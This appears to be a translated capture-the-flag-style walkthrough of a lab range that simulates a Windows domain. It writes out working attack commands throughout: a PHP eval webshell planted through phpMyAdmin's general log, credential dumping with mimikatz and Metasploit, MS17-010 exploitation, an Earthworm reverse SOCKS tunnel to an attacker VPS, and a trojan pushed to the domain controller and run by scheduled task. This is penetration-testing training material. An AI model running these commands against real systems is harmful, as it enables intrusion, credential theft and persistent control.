Shooting range introduction:
The actual combat series mainly uses real corporate environments as examples to build a series of shooting ranges, and learn through the trinity of exercises, video tutorials, and blogs. In addition, this actual combat completely simulates the ATT&CK attack link to build, opening into a complete closed loop. Follow-up will also build a real APT actual combat environment to grow from actual combat. Regarding the environment, various actual combat routes can be simulated. At present, the author’s actual combat route is given as follows. All virtual machines have a unified password: hongrisec@2019:
1. Environment construction
1. Environment build test
2. Information collection
2. Vulnerability Exploitation
3. Vulnerability search and exploitation
4. Background Getshell upload skills
5. System information collection
6. Host password collection
3. Intranet collection
7. Intranet-continue information collection
8. Intranet attack posture-information leakage
9. Intranet attack posture-MS08-067
10. Intranet attack posture-SMB remote desktop password guessing
11. Intranet attack posture-Oracle database TNS service vulnerability
12. Intranet attack posture-RPC DCOM service vulnerability
Fourth, lateral movement
13. Other host ports in the intranet-file reading
14. Other host ports in the intranet-redis
15. Other host ports in the intranet-redis Getshell
16. Other host ports in the intranet-MySQL database
17. Other host ports in the intranet-MySQL privilege escalation
Five, build a channel
18. Other host ports in the intranet-proxy forwarding
Six, lasting control
19. Domain penetration-domain member information collection
20. Domain penetration-weak password detection and deep use of powershell for basic services
21. Domain penetration-lateral movement [wmi utilization]
22. Domain penetration-C2 command execution
23. Domain penetration-use DomainFronting to realize deep hiding of beacon
24. Domain penetration-realization and utilization of domain control
Seven, trace cleanup
25, log cleanup
ATT&CK Evaluation Actual Combat Range
File size: 13 GB
File MD5: e16fd0f6a5104aef0dfa73460afff0e8
File SHA1: 078ce02d01298fe40a1feb8260fde79d5fb06bc6
1. Vulnerability search and utilization 2. Background Getshell upload skills 3. System information collection 4. Host password collection
1. Intranet-continue information collection 2. Intranet attack posture-information leakage 3. Intranet attack posture-MS08-067 4. Intranet attack posture-SMB remote desktop password guessing 5. Intranet attack posture-Oracle database TNS service vulnerability 6. Intranet attack posture-RPC DCOM service vulnerability
1. Intranet other host ports-file reading 2. Intranet other host ports-redis 3. Intranet other host ports-redis Getshell 4. Intranet other host ports-MySQL database 5. Intranet other host ports-MySQL mention right
Intranet other host port-proxy forwarding
1. Domain penetration-domain member information collection 2. Domain penetration-basic service weak password detection and deep utilization of powershell 3. Domain penetration-lateral movement [wmi utilization] 4. Domain penetration-C2 command execution 5. Domain penetration-use of DomainFronting Realize the deep hiding of beacon 6. Domain penetration-domain control realization and utilization
The following is the topology of the entire range:
Windows7 (with phpstudy web environment)
Analog external network ip: 192.168.161.129
Intranet ip: 192.168.52.143
Hosts in the domain:
Intranet ip: 192.168.52.141
Intranet ip: 192.168.52.138
The above intranet cannot communicate with the external network, only win7 can connect to the internal and external networks.
Let’s start the actual combat! ! !
Preliminary Study on the Extranet
The simulated external network ip to access the web server win7-192.168.161.129
It is a web site, and the back-end address-/index.php?r=admin is leaked in the “Announcement Information” on the right, we log in to the back-end, check the default back-end password of yxcms and log in:
Found that the php file can be directly edited in the front-end template function, we can directly write to the webshell and connect
We write in acomment.php
After saving, we will find a way to find the directory where this acomment.php is located, let’s scan the background
Found many directories, here we found that this cms has a directory traversal vulnerability:
At this time, as long as you browse to find the page you just modified, you can use the shell connector to connect.
Another method here is that we found that there is phpmyadmin on the web server, then we can log in. This is the target machine, which is naturally a weak password (root/root):
The common methods of phpmyadmin background getshell are the following methods:
1. Select into outfile to write directly
2. Open the global log getshell
3. Use slow query log getsehll
4. Use error log getshell
5. Use phpmyadmin4.8.x local file to contain vulnerability getshell
Execute the following sql statement
show variables like '%secure%';
It is found that there is no write permission and cannot be written into the shell using the select into outfile method. Let’s take a look at the second method, use the global variable general_log to get shell
We turn on the global log and set the directory where the log is saved to the web directory
set global general_log=on;# Open log set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# Set the log location to the website directory
At this time, execute the following statement to write webshell to hack.php
select '<?php eval($_POST[whoami]); ?>'
then connect it
Break into the intranet
We found that the shell we just got was an administrator’s shell
That’s great. The next thing we need to do is collect information to prepare for the intranet.
ipconfig /all View the local ip and domain Route print Print routing information Net view View other host names in the LAN Arp -a View the arp cache Net start Check which services are enabled Net share Check which sharing is enabled Net share ipc$ Open ipc sharing Net share c$ Open c drive sharing Net use \\192.168.xx.xx\ipc$ "" /user:"" Establish an empty connection with 192.168.xx.xx Net use \\192.168.xx.xx\c$ "password" /user:"user name" Create c drive sharing Dir \\192.168.xx.xx\c$\user View the files in the user directory of disk 192.168.xx.xx Net config Workstation View computer name, full name, user name, system version, workstation, domain, login domain Net user View the list of local users Net user /domain View domain users Net localgroup administrators View the local administrator group (usually there are domain users) Net view /domain View how many domains Net user username /domain Get the information of the specified domain user Net group /domain View the workgroups in the domain, and check how many groups the users are divided into (only operate on the domain controller) Net group group name /domain View a working group in the domain Net group "domain admins" /domain View the names of domain administrators Net group "domain computers" /domain View other host names in the domain Net group "doamin controllers" /domain View domain controllers (there may be more than one)
Collected the following key information:
The domain name is god.org, the domain controller is OWA$, the domain administrator is Administrator, and the internal network segment is 192.168.52.1/24. We use the Ping command to detect the domain controller’s ip
It can be seen that the domain controller ip is 192.168.52.138.
Next, we create a whoami user on the win7 local host and add it to the administrator group
Then try to log in remotely to see if 3389 is turned on:
netstat -ano | find "3389"
Found it was on.
If it is not turned on, use the following command to turn it on
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
I tried to log in to the remote desktop connection with the whoami user but failed. Nmap scanned port 3389 and found that the status was filtered, which seems to be filtered by the firewall. At this time, we can bounce a msf shell back, and then use enable_rdp to try to close the firewall.
Here, for the authenticity of the experimental environment, I regard my attacker kali as a host in another LAN, and use frp to map msf to the external network vps to achieve control of “remote” windows7:
Generate and upload Trojan
Execute the Trojan horse and listen on kali
Go online successfully.
Because it is an administrator user, it is easy to escalate rights.
Execute run post/windows/manage/enable_rdp module to turn off the firewall, and use rdesktop to open the remote desktop
Successfully opened the remote desktop. Next, we further collect information.
Grab the hash
Failed, we use msf’s own module for hash fetching
meterpreter > run post/windows/gather/smart_hashdump
We upload and use mimitakz (need to avoid killing in actual combat) for crawling
Elevate permissions first
At this point we have obtained the plaintext password of the administrator (domain administrator)-Liu78963
Next, we further penetrate into the intranet and infiltrate other hosts in the domain.
Go further (lateral movement)
We use the following methods to detect surviving hosts on the intranet：
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" Use Ping command to detect internal network hosts
An intranet host was detected with ip 192.168.52.141. Let’s add a route to infiltrate the host.
Detect whether ms17_010 exists:
A loophole was found and then attack.
The attack failed. With the built-in 17-010 of msf, failure is a common thing. Sometimes msf fails to receive the session after running 2003 for many times, and when ms17-010 is used, server 2003 is easily blue screen. You can try the msf 17-010 script (ms17_010_eternalblue_doublepulsar) for the full version of windows 2003-windows 10 on github. We can try to open the remote desktop of the host directly. Since the host is in the internal network, our attacking machine is relatively in the external network and cannot directly communicate with the host in the internal network, so we need to use Earthworm as a Socks5 proxy to enter the internal network. Net to get more hosts.
Open Earthworm monitoring on our public network vps
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
This command means to add a transfer tunnel, monitor 1234, and forward the proxy request received on the local port 1024 to port 1080, where port 1024 is only used to transmit traffic.
Upload ew_for_Win.exe to the victim host of win7, and start the socks5 server on win7 and bounce to vps
ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e 1234
Then configure proxychains:
In this way, the intranet host win2003 can communicate with the attacking machine kali through vps. Here we need to know that we set up routing on the msf to allow msf to communicate to other hosts on the intranet; and we set up the proxy to allow other tools on the attacking machine Can communicate to other hosts on the intranet.
Use nmap to scan port 3389 of win2003 and find that it is not enabled:
proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141 # -Pn and -sT must have
We use the auxiliary/admin/smb/ms17_010_command module to execute the command to turn it on:
Scan again to open
Open remote desktop
Here, I used to add a user first, and then use exploit/windows/smb/ms17_010_psexec to try to call a shell back, because this module requires you to specify an administrator user.
First use auxiliary/admin/smb/ms17_010_command to add a user
And add this user to the administrator group:
Check to see that the addition was successful:
Then use exploit/windows/smb/ms17_010_psexec to try to call a shell back, and finally succeeded after several attempts:
And is the highest authority.
First check which patches are not applied..
There are too few patches…
After got win2003, the next step is to enter the domain control
Enter domain control
The first thing I thought of was ms17_010, but it also failed, because we had obtained the password of the domain administrator administrator-Liu78963 in the previous information collection, so I tried to log in remotely.
Failure, also because 3389 is not turned on
Tried to open but failed
There is only another way of thinking, here we upload a msf Trojan on the domain control through win7.
First use win7 to connect to the c drive sharing of the domain controller
net use \\192.168.52.138\c$ "Liu78963" /user:"administrator"
Use dir to view the resources of the domain controller.
Upload the shell.exe on the win7 host to the domain controller
copy c:\phpstudy\www\yxcms\shell.exe \\192.168.52.138\c$
Set up a task plan and start the Trojan regularly to get the domain control shell
shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System /u administrator /p "Liu78963"
This shooting range can be considered a very basic shooting range, very suitable for novice practice。